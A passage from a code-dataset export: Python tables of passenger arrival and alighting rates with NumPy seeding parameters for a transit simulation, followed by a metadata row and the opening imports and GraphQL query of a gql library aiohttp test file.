(40, 70, 67, 37, 15, 0, 62, 80, 44, 39, 26, 0), # 12
(40, 75, 70, 39, 19, 0, 65, 88, 47, 44, 28, 0), # 13
(45, 87, 73, 40, 21, 0, 69, 92, 52, 46, 30, 0), # 14
(50, 92, 78, 43, 22, 0, 72, 97, 57, 52, 34, 0), # 15
(52, 98, 81, 43, 24, 0, 77, 101, 63, 54, 36, 0), # 16
(54, 105, 90, 44, 27, 0, 81, 106, 66, 57, 36, 0), # 17
(56, 110, 97, 45, 29, 0, 87, 113, 70, 59, 37, 0), # 18
(59, 120, 102, 47, 30, 0, 94, 119, 75, 62, 39, 0), # 19
(61, 124, 108, 48, 31, 0, 98, 124, 76, 65, 39, 0), # 20
(65, 126, 111, 50, 31, 0, 100, 132, 78, 68, 39, 0), # 21
(66, 131, 115, 51, 33, 0, 105, 141, 83, 72, 41, 0), # 22
(68, 136, 119, 54, 35, 0, 114, 151, 86, 74, 42, 0), # 23
(70, 143, 124, 57, 36, 0, 117, 163, 90, 76, 44, 0), # 24
(75, 151, 130, 59, 38, 0, 118, 167, 94, 81, 46, 0), # 25
(80, 155, 133, 60, 39, 0, 125, 175, 96, 81, 49, 0), # 26
(86, 166, 133, 60, 39, 0, 131, 183, 101, 86, 53, 0), # 27
(90, 173, 139, 62, 41, 0, 139, 191, 105, 90, 55, 0), # 28
(92, 182, 146, 64, 45, 0, 144, 195, 114, 90, 57, 0), # 29
(95, 190, 147, 65, 48, 0, 151, 198, 120, 94, 59, 0), # 30
(99, 195, 153, 69, 50, 0, 156, 203, 127, 100, 61, 0), # 31
(107, 201, 159, 76, 51, 0, 160, 211, 132, 106, 62, 0), # 32
(107, 208, 164, 80, 53, 0, 166, 220, 138, 113, 65, 0), # 33
(108, 212, 169, 85, 55, 0, 172, 225, 143, 114, 68, 0), # 34
(112, 215, 176, 87, 58, 0, 175, 234, 148, 116, 69, 0), # 35
(112, 219, 181, 88, 61, 0, 181, 240, 150, 123, 71, 0), # 36
(116, 225, 188, 89, 61, 0, 187, 243, 153, 127, 75, 0), # 37
(117, 233, 193, 96, 61, 0, 195, 248, 157, 134, 77, 0), # 38
(119, 242, 199, 98, 62, 0, 195, 256, 159, 141, 77, 0), # 39
(120, 249, 204, 100, 62, 0, 198, 263, 160, 144, 83, 0), # 40
(120, 255, 209, 103, 65, 0, 206, 270, 163, 149, 86, 0), # 41
(126, 264, 216, 108, 69, 0, 210, 278, 168, 152, 88, 0), # 42
(129, 272, 221, 113, 72, 0, 213, 283, 170, 158, 89, 0), # 43
(132, 277, 227, 114, 72, 0, 217, 289, 171, 160, 90, 0), # 44
(134, 284, 228, 116, 73, 0, 230, 296, 173, 166, 91, 0), # 45
(138, 288, 234, 118, 76, 0, 233, 301, 175, 172, 94, 0), # 46
(140, 294, 238, 121, 77, 0, 238, 303, 177, 175, 95, 0), # 47
(144, 300, 245, 124, 82, 0, 242, 310, 183, 176, 96, 0), # 48
(151, 307, 248, 126, 83, 0, 246, 313, 185, 178, 97, 0), # 49
(155, 313, 251, 128, 83, 0, 248, 318, 192, 182, 98, 0), # 50
(157, 320, 255, 132, 86, 0, 253, 321, 196, 183, 98, 0), # 51
(160, 327, 259, 134, 88, 0, 256, 324, 200, 187, 99, 0), # 52
(161, 334, 263, 136, 90, 0, 258, 329, 206, 191, 100, 0), # 53
(164, 341, 269, 137, 94, 0, 260, 332, 215, 194, 102, 0), # 54
(166, 348, 278, 138, 96, 0, 265, 339, 217, 198, 102, 0), # 55
(169, 354, 282, 138, 97, 0, 266, 347, 219, 202, 103, 0), # 56
(172, 360, 292, 140, 99, 0, 270, 350, 224, 207, 103, 0), # 57
(178, 367, 299, 147, 101, 0, 271, 356, 229, 208, 106, 0), # 58
(178, 367, 299, 147, 101, 0, 271, 356, 229, 208, 106, 0), # 59
)
passenger_arriving_rate = (
(2.649651558384548, 5.43716856060606, 4.79654161311054, 2.534510869565217, 1.428605769230769, 0.0, 4.75679347826087, 5.714423076923076, 3.801766304347826, 3.1976944087403596, 1.359292140151515, 0.0), # 0
(2.6745220100478, 5.497633278970258, 4.822449322514997, 2.5486257548309177, 1.439313301282051, 0.0, 4.7551721391908215, 5.757253205128204, 3.8229386322463768, 3.2149662150099974, 1.3744083197425645, 0.0), # 1
(2.699108477221734, 5.557201122334455, 4.8477420736932295, 2.562429951690821, 1.4497948717948717, 0.0, 4.753501207729468, 5.799179487179487, 3.8436449275362317, 3.23182804912882, 1.3893002805836137, 0.0), # 2
(2.72339008999122, 5.6158078125, 4.872401389781491, 2.575911684782608, 1.4600408653846155, 0.0, 4.7517809103260875, 5.840163461538462, 3.863867527173912, 3.2482675931876606, 1.403951953125, 0.0), # 3
(2.747345978441128, 5.673389071268238, 4.896408793916024, 2.589059178743961, 1.4700416666666667, 0.0, 4.750011473429951, 5.880166666666667, 3.883588768115942, 3.2642725292773487, 1.4183472678170594, 0.0), # 4
(2.7709552726563262, 5.729880620440516, 4.919745809233076, 2.6018606582125603, 1.47978766025641, 0.0, 4.748193123490338, 5.91915064102564, 3.9027909873188404, 3.279830539488717, 1.432470155110129, 0.0), # 5
(2.794197102721686, 5.785218181818181, 4.942393958868895, 2.614304347826087, 1.4892692307692306, 0.0, 4.746326086956522, 5.957076923076922, 3.9214565217391306, 3.294929305912597, 1.4463045454545453, 0.0), # 6
(2.817050598722076, 5.83933747720258, 4.964334765959725, 2.626378472222222, 1.498476762820513, 0.0, 4.744410590277778, 5.993907051282052, 3.939567708333333, 3.309556510639817, 1.459834369300645, 0.0), # 7
(2.8394948907423667, 5.89217422839506, 4.985549753641817, 2.638071256038647, 1.5074006410256409, 0.0, 4.7424468599033816, 6.0296025641025635, 3.9571068840579704, 3.3236998357612113, 1.473043557098765, 0.0), # 8
(2.8615091088674274, 5.943664157196969, 5.006020445051414, 2.649370923913043, 1.5160312499999997, 0.0, 4.740435122282609, 6.064124999999999, 3.9740563858695652, 3.3373469633676094, 1.4859160392992423, 0.0), # 9
(2.8830723831821286, 5.993742985409652, 5.025728363324764, 2.660265700483092, 1.5243589743589743, 0.0, 4.738375603864734, 6.097435897435897, 3.990398550724638, 3.3504855755498424, 1.498435746352413, 0.0), # 10
(2.9041638437713395, 6.042346434834456, 5.044655031598114, 2.6707438103864733, 1.5323741987179484, 0.0, 4.736268531099034, 6.129496794871794, 4.0061157155797105, 3.3631033543987425, 1.510586608708614, 0.0), # 11
(2.92476262071993, 6.089410227272726, 5.062781973007712, 2.680793478260869, 1.5400673076923075, 0.0, 4.734114130434782, 6.16026923076923, 4.021190217391304, 3.375187982005141, 1.5223525568181815, 0.0), # 12
(2.944847844112769, 6.134870084525814, 5.080090710689802, 2.690402928743961, 1.547428685897436, 0.0, 4.731912628321256, 6.189714743589744, 4.035604393115942, 3.386727140459868, 1.5337175211314535, 0.0), # 13
(2.9643986440347283, 6.1786617283950624, 5.096562767780632, 2.699560386473429, 1.5544487179487176, 0.0, 4.729664251207729, 6.217794871794871, 4.049340579710144, 3.397708511853755, 1.5446654320987656, 0.0), # 14
(2.9833941505706756, 6.220720880681816, 5.112179667416451, 2.708254076086956, 1.5611177884615384, 0.0, 4.7273692255434785, 6.2444711538461535, 4.062381114130434, 3.408119778277634, 1.555180220170454, 0.0), # 15
(3.001813493805482, 6.26098326318743, 5.126922932733505, 2.716472222222222, 1.5674262820512819, 0.0, 4.725027777777778, 6.2697051282051275, 4.074708333333333, 3.4179486218223363, 1.5652458157968574, 0.0), # 16
(3.019635803824017, 6.299384597713242, 5.140774086868038, 2.724203049516908, 1.5733645833333332, 0.0, 4.722640134359904, 6.293458333333333, 4.0863045742753625, 3.4271827245786914, 1.5748461494283106, 0.0), # 17
(3.03684021071115, 6.3358606060606055, 5.153714652956299, 2.7314347826086958, 1.578923076923077, 0.0, 4.72020652173913, 6.315692307692308, 4.097152173913043, 3.435809768637532, 1.5839651515151514, 0.0), # 18
(3.053405844551751, 6.370347010030863, 5.165726154134533, 2.738155646135265, 1.5840921474358973, 0.0, 4.717727166364734, 6.336368589743589, 4.107233469202898, 3.4438174360896885, 1.5925867525077158, 0.0), # 19
(3.0693118354306894, 6.402779531425363, 5.1767901135389875, 2.7443538647342995, 1.5888621794871793, 0.0, 4.71520229468599, 6.355448717948717, 4.11653079710145, 3.4511934090259917, 1.6006948828563408, 0.0), # 20
(3.084537313432836, 6.433093892045452, 5.186888054305913, 2.750017663043478, 1.5932235576923073, 0.0, 4.712632133152174, 6.372894230769229, 4.125026494565217, 3.4579253695372754, 1.608273473011363, 0.0), # 21
(3.099061408643059, 6.46122581369248, 5.19600149957155, 2.7551352657004826, 1.5971666666666662, 0.0, 4.710016908212561, 6.388666666666665, 4.132702898550725, 3.464000999714367, 1.61530645342312, 0.0), # 22
(3.1128632511462295, 6.487111018167789, 5.204111972472151, 2.759694897342995, 1.6006818910256408, 0.0, 4.707356846316426, 6.402727564102563, 4.139542346014493, 3.4694079816481005, 1.6217777545419472, 0.0), # 23
(3.125921971027217, 6.5106852272727265, 5.211200996143958, 2.763684782608695, 1.6037596153846152, 0.0, 4.704652173913043, 6.415038461538461, 4.1455271739130435, 3.474133997429305, 1.6276713068181816, 0.0), # 24
(3.1382166983708903, 6.531884162808641, 5.217250093723222, 2.7670931461352657, 1.606390224358974, 0.0, 4.701903117451691, 6.425560897435896, 4.150639719202899, 3.4781667291488145, 1.6329710407021603, 0.0), # 25
(3.1497265632621207, 6.550643546576878, 5.222240788346187, 2.7699082125603858, 1.6085641025641022, 0.0, 4.699109903381642, 6.434256410256409, 4.154862318840579, 3.4814938588974575, 1.6376608866442195, 0.0), # 26
(3.160430695785777, 6.566899100378786, 5.226154603149099, 2.772118206521739, 1.6102716346153847, 0.0, 4.696272758152174, 6.441086538461539, 4.158177309782609, 3.484103068766066, 1.6417247750946966, 0.0), # 27
(3.1703082260267292, 6.580586546015712, 5.228973061268209, 2.7737113526570045, 1.6115032051282048, 0.0, 4.69339190821256, 6.446012820512819, 4.160567028985507, 3.4859820408454727, 1.645146636503928, 0.0), # 28
(3.1793382840698468, 6.591641605289001, 5.230677685839759, 2.7746758756038647, 1.6122491987179486, 0.0, 4.690467580012077, 6.448996794871794, 4.162013813405797, 3.487118457226506, 1.6479104013222503, 0.0), # 29
(3.1875, 6.6, 5.23125, 2.775, 1.6124999999999998, 0.0, 4.6875, 6.449999999999999, 4.1625, 3.4875, 1.65, 0.0), # 30
(3.1951370284526854, 6.606943039772726, 5.230820969202898, 2.7749414624183006, 1.6124087322695035, 0.0, 4.683376259786773, 6.449634929078014, 4.162412193627451, 3.4872139794685983, 1.6517357599431814, 0.0), # 31
(3.202609175191816, 6.613794318181818, 5.229546014492753, 2.7747669934640515, 1.6121368794326238, 0.0, 4.677024758454107, 6.448547517730495, 4.162150490196078, 3.4863640096618354, 1.6534485795454545, 0.0), # 32
(3.2099197969948845, 6.620552982954545, 5.227443342391305, 2.774478308823529, 1.6116873670212764, 0.0, 4.66850768365817, 6.446749468085105, 4.161717463235294, 3.4849622282608697, 1.6551382457386363, 0.0), # 33
(3.217072250639386, 6.627218181818182, 5.224531159420289, 2.7740771241830067, 1.6110631205673758, 0.0, 4.657887223055139, 6.444252482269503, 4.16111568627451, 3.4830207729468596, 1.6568045454545455, 0.0), # 34
(3.224069892902813, 6.633789062499998, 5.220827672101449, 2.773565155228758, 1.6102670656028368, 0.0, 4.645225564301183, 6.441068262411347, 4.160347732843137, 3.480551781400966, 1.6584472656249996, 0.0), # 35
(3.23091608056266, 6.6402647727272734, 5.2163510869565215, 2.7729441176470586, 1.6093021276595745, 0.0, 4.630584895052474, 6.437208510638298, 4.159416176470589, 3.477567391304347, 1.6600661931818184, 0.0), # 36
(3.2376141703964194, 6.6466444602272725, 5.211119610507246, 2.7722157271241827, 1.6081712322695032, 0.0, 4.614027402965184, 6.432684929078013, 4.158323590686274, 3.474079740338164, 1.6616611150568181, 0.0), # 37
(3.2441675191815853, 6.652927272727272, 5.205151449275362, 2.7713816993464047, 1.6068773049645388, 0.0, 4.595615275695485, 6.427509219858155, 4.157072549019607, 3.4701009661835744, 1.663231818181818, 0.0), # 38
(3.250579483695652, 6.659112357954545, 5.198464809782608, 2.7704437499999996, 1.6054232712765955, 0.0, 4.57541070089955, 6.421693085106382, 4.155665625, 3.4656432065217384, 1.6647780894886361, 0.0), # 39
(3.2568534207161126, 6.6651988636363635, 5.191077898550724, 2.7694035947712417, 1.6038120567375882, 0.0, 4.5534758662335495, 6.415248226950353, 4.154105392156863, 3.4607185990338163, 1.6662997159090909, 0.0), # 40
(3.26299268702046, 6.671185937499998, 5.1830089221014495, 2.768262949346405, 1.6020465868794325, 0.0, 4.529872959353657, 6.40818634751773, 4.152394424019608, 3.455339281400966, 1.6677964843749995, 0.0), # 41
(3.269000639386189, 6.677072727272728, 5.174276086956522, 2.767023529411764, 1.6001297872340425, 0.0, 4.504664167916042, 6.40051914893617, 4.150535294117646, 3.4495173913043478, 1.669268181818182, 0.0), # 42
(3.2748806345907933, 6.682858380681817, 5.164897599637681, 2.7656870506535944, 1.5980645833333331, 0.0, 4.477911679576878, 6.3922583333333325, 4.148530575980392, 3.4432650664251203, 1.6707145951704543, 0.0), # 43
(3.2806360294117645, 6.688542045454545, 5.154891666666667, 2.7642552287581696, 1.5958539007092198, 0.0, 4.449677681992337, 6.383415602836879, 4.146382843137254, 3.4365944444444443, 1.6721355113636363, 0.0), # 44
(3.286270180626598, 6.694122869318181, 5.144276494565218, 2.7627297794117642, 1.593500664893617, 0.0, 4.420024362818591, 6.374002659574468, 4.144094669117647, 3.4295176630434785, 1.6735307173295453, 0.0), # 45
(3.291786445012788, 6.6996, 5.133070289855073, 2.761112418300653, 1.5910078014184397, 0.0, 4.389013909711811, 6.364031205673759, 4.14166862745098, 3.4220468599033818, 1.6749, 0.0), # 46
(3.297188179347826, 6.704972585227273, 5.12129125905797, 2.759404861111111, 1.588378235815603, 0.0, 4.356708510328169, 6.353512943262412, 4.139107291666666, 3.4141941727053133, 1.6762431463068181, 0.0), # 47
(3.3024787404092075, 6.710239772727273, 5.108957608695651, 2.757608823529411, 1.5856148936170211, 0.0, 4.323170352323839, 6.3424595744680845, 4.136413235294117, 3.4059717391304343, 1.6775599431818182, 0.0), # 48
(3.307661484974424, 6.715400710227271, 5.096087545289855, 2.75572602124183, 1.5827207003546098, 0.0, 4.288461623354989, 6.330882801418439, 4.133589031862745, 3.3973916968599034, 1.6788501775568176, 0.0), # 49
(3.312739769820972, 6.720454545454543, 5.082699275362319, 2.7537581699346405, 1.5796985815602835, 0.0, 4.252644511077794, 6.318794326241134, 4.130637254901961, 3.388466183574879, 1.6801136363636358, 0.0), # 50
(3.317716951726343, 6.725400426136363, 5.068811005434783, 2.7517069852941174, 1.5765514627659571, 0.0, 4.215781203148426, 6.306205851063829, 4.127560477941176, 3.3792073369565214, 1.6813501065340908, 0.0), # 51
(3.322596387468031, 6.730237499999999, 5.054440942028985, 2.7495741830065357, 1.573282269503546, 0.0, 4.177933887223055, 6.293129078014184, 4.124361274509804, 3.3696272946859898, 1.6825593749999999, 0.0), # 52
(3.3273814338235295, 6.7349649147727275, 5.039607291666666, 2.7473614787581697, 1.5698939273049646, 0.0, 4.139164750957854, 6.279575709219858, 4.121042218137255, 3.359738194444444, 1.6837412286931819, 0.0), # 53
(3.332075447570333, 6.739581818181817, 5.024328260869565, 2.745070588235294, 1.5663893617021276, 0.0, 4.099535982008995, 6.2655574468085105, 4.117605882352941, 3.3495521739130427, 1.6848954545454542, 0.0), # 54
(3.336681785485933, 6.744087357954545, 5.008622056159419, 2.7427032271241827, 1.5627714982269503, 0.0, 4.05910976803265, 6.251085992907801, 4.114054840686275, 3.3390813707729463, 1.6860218394886362, 0.0), # 55
(3.341203804347826, 6.74848068181818, 4.9925068840579705, 2.740261111111111, 1.5590432624113475, 0.0, 4.017948296684991, 6.23617304964539, 4.110391666666667, 3.328337922705314, 1.687120170454545, 0.0), # 56
(3.345644860933504, 6.752760937500001, 4.976000951086956, 2.7377459558823527, 1.5552075797872338, 0.0, 3.9761137556221886, 6.220830319148935, 4.106618933823529, 3.317333967391304, 1.6881902343750002, 0.0), # 57
(3.3500083120204605, 6.756927272727271, 4.959122463768115, 2.7351594771241827, 1.5512673758865245, 0.0, 3.9336683325004165, 6.205069503546098, 4.102739215686275, 3.3060816425120767, 1.6892318181818178, 0.0), # 58
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 59
)
passenger_allighting_rate = (
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 0
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 1
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 2
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 3
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 4
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 5
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 6
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 7
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 8
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 9
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 10
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 11
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 12
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 13
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 14
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 15
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 16
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 17
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 18
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 19
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 20
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 21
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 22
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 23
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 24
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 25
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 26
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 27
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 28
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 29
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 30
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 31
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 32
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 33
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 34
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 35
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 36
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 37
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 38
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 39
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 40
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 41
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 42
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 43
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 44
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 45
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 46
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 47
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 48
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 49
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 50
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 51
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 52
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 53
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 54
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 55
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 56
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 57
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 58
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 59
)
"""
parameters for reproducibiliy. More information: https://numpy.org/doc/stable/reference/random/parallel.html
"""
#initial entropy
entropy = 258194110137029475889902652135037600173
#index for seed sequence child
child_seed_index = (
1, # 0
97, # 1
)
| 112.486567 | 215 | 0.727623 | 5,147 | 37,683 | 5.325044 | 0.217602 | 0.315236 | 0.249562 | 0.472855 | 0.333552 | 0.331728 | 0.330852 | 0.330342 | 0.330342 | 0.330342 | 0 | 0.817902 | 0.119789 | 37,683 | 334 | 216 | 112.823353 | 0.008411 | 0.032137 | 0 | 0.202532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.015823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ab02e8f59de35acb2de9b4e22d29b46d2514cadc | 32,368 | py | Python | tests/test_aiohttp.py | bollwyvl/gql | fe213c42f07ae14f1311fd5cdd453413a35156df | [
"MIT"
] | null | null | null | tests/test_aiohttp.py | bollwyvl/gql | fe213c42f07ae14f1311fd5cdd453413a35156df | [
"MIT"
] | null | null | null | tests/test_aiohttp.py | bollwyvl/gql | fe213c42f07ae14f1311fd5cdd453413a35156df | [
"MIT"
] | null | null | null | import io
import json
from typing import Mapping
import pytest
from gql import Client, gql
from gql.cli import get_parser, main
from gql.transport.exceptions import (
TransportAlreadyConnected,
TransportClosed,
TransportProtocolError,
TransportQueryError,
TransportServerError,
)
from .conftest import TemporaryFile
query1_str = """
query getContinents {
continents {
code
name
}
}
"""
